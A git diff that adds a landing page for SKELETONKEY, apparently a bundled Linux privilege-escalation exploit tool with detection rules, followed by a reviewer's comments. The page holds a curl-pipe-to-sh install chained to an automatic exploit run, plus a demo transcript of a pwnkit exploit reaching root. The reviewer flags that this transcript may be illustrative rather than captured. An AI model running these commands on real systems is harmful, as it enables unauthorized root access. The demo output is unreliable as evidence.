diff --git a/docs/.nojekyll b/docs/.nojekyll new file mode 100644 index 0000000..e69de29 diff --git a/docs/index.html b/docs/index.html new file mode 100644 index 0000000..7bde390 --- /dev/null +++ b/docs/index.html @@ -0,0 +1,278 @@ + + +
+ + ++ One curated binary. 28 Linux LPE exploits from + 2016 → 2026. Detection rules in the box. + One command picks the safest one and runs it. +
+ +$ curl -sSL https://github.com/KaraZajac/SKELETONKEY/releases/latest/download/install.sh | sh \
+ && skeletonkey --auto --i-know
+ ⚠ Authorized testing only — see ETHICS.md
+ + ++ Most Linux privesc tooling is broken in one of three ways: +
++ SKELETONKEY is one binary, actively maintained, with detection + rules for every CVE it bundles — same project for red and blue + teams. +
+Structural exploits + page-cache writes. No per-kernel offsets needed.
+--full-chainDefault returns EXPLOIT_FAIL honestly. With --full-chain + resolved offsets, runs the shared modprobe_path finisher.
One tested binary. --auto ranks vulnerable modules by safety and runs the safest. Honest scope reporting — never claims root it didn't actually get. No more curating stale PoC repos.
Auditd + sigma + yara + falco rules for every CVE. One command ships SIEM coverage: --detect-rules --format=auditd | sudo tee /etc/audit/rules.d/99-skeletonkey.rules.
skeletonkey --scan (no sudo needed) tells you which boxes still need patching. JSON output for CI gates. Fleet-scan tool included. No SaaS, no telemetry.
Reproducible LPE environment with public CVEs across a 10-year timeline. Each module documents the bug, the trigger, and the fix. Detection rules let you practice both sides.
+--auto on a vulnerable Ubuntu 22.04 box:
$ id +uid=1000(kara) gid=1000(kara) groups=1000(kara) + +$ skeletonkey --auto --i-know +[*] auto: host=demo kernel=5.15.0-56-generic arch=x86_64 +[*] auto: scanning 28 modules for vulnerabilities... +[+] auto: dirty_pipe VULNERABLE (safety rank 90) +[+] auto: cgroup_release_agent VULNERABLE (safety rank 98) +[+] auto: pwnkit VULNERABLE (safety rank 100) + +[*] auto: 3 vulnerable modules found. Safest is 'pwnkit' (rank 100). +[*] auto: launching --exploit pwnkit... + +[+] pwnkit: writing gconv-modules cache + payload.so... +[+] pwnkit: execve(pkexec) with NULL argv + crafted envp... +# id +uid=0(root) gid=0(root) groups=0(root)+ +
+ Safety ranking goes structural escapes → + page-cache writes → + userspace cred-races → + kernel primitives → + kernel races. The goal is to never crash a + production box looking for root. +
++ Most public PoC repos hardcode offsets for one kernel build and + silently break elsewhere. SKELETONKEY refuses to ship fabricated + offsets. +
+--full-chain finisher returns EXPLOIT_OK only when a setuid bash sentinel file actually appearsEXPLOIT_FAIL with diagnosticskeletonkey --dump-offsets (parses /proc/kallsyms or /boot/System.map) and upstream the entry via PR — see CONTRIBUTING.md# Install (x86_64 / arm64; checksum-verified) +$ curl -sSL https://github.com/KaraZajac/SKELETONKEY/releases/latest/download/install.sh | sh + +# What's this box vulnerable to? (no sudo) +$ skeletonkey --scan + +# Pick the safest LPE and run it +$ skeletonkey --auto --i-know + +# Deploy detection rules (needs sudo to write into /etc/audit/rules.d/) +$ skeletonkey --detect-rules --format=auditd \ + | sudo tee /etc/audit/rules.d/99-skeletonkey.rules + +# Fleet scan — many hosts via SSH, aggregated JSON for SIEM +$ ./tools/skeletonkey-fleet-scan.sh --binary skeletonkey \ + --ssh-key ~/.ssh/id_rsa hosts.txt+
+ v0.5.0 cut 2026-05-17. 28 modules build clean + on Debian 13 (kernel 6.12) and refuse cleanly on patched hosts. + Empirical end-to-end validation on a vulnerable-kernel VM matrix + is the next roadmap item; until then, the corpus is best + understood as "compiles + detects + structurally correct + + honest on failure." +
+ +
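Review bot: the Demo transcript on this page shows a root shell on a "kernel=5.15.0-56-generic" Ubuntu 22.04 host, yet the Status section of the same file states that "Empirical end-to-end validation on a vulnerable-kernel VM matrix is the next roadmap item"; either label the transcript as illustrative or record where and when it was actually captured, because the page's own promise ("never claims root it didn't actually get") has to hold for the docs as well. The ranks printed in that transcript (pwnkit 100, cgroup_release_agent 98, dirty_pipe 90) also contradict the stated order "structural escapes → page-cache writes → userspace cred-races → kernel primitives → kernel races" unless pwnkit is being counted as a structural escape rather than a userspace bug; state which tier each module is in so the number is explainable. Two smaller points: the hero one-liner `curl -sSL https://github.com/KaraZajac/SKELETONKEY/releases/latest/download/install.sh | sh && skeletonkey --auto --i-know` pipes an unseen script into sh and chains a privilege-escalation exploit onto the same line, while the Quickstart comment calls the install "checksum-verified"; split the install from the exploit and say what the checksum is checked against (a signed SHA256SUMS file, a pinned release tag) so a reader can verify the claim before trusting the binary. And the auditd deployment line `--detect-rules --format=auditd | sudo tee /etc/audit/rules.d/99-skeletonkey.rules` only writes the file; add `sudo augenrules --load` (or `sudo auditctl -R` on the file) after the tee, otherwise the "one command ships SIEM coverage" claim is not true until the next auditd restart.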